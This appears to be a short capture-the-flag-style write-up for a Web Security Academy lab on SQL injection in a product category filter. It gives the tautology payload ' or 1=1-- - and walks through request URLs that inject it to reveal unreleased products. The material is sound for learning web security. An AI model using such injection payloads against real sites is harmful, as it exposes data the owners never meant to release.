Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.

Solution:

' or 1=1-- -

SELECT * FROM products WHERE category = '' or 1=1-- -' AND released = 1

Steps:

Visit:https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories
Insert single quote [ ' ] :https://YOUR-SESSION.web-security-academy.net/filter?category=Accessories'
You will gain an internal server error
Try to inject tautology payload to retrieve released and unreleased products
https://ac631f881eeeb165c0bf17e90011009b.web-security-academy.net/filter?category=Accessories' or 1=1-- -

PreviousSQL injection NextLab: SQL injection vulnerability allowing login bypass

Last updated 2 years ago

hashtagLab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden dataarrow-up-right

hashtagSolution:

hashtagSteps:

Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Solution:

Steps: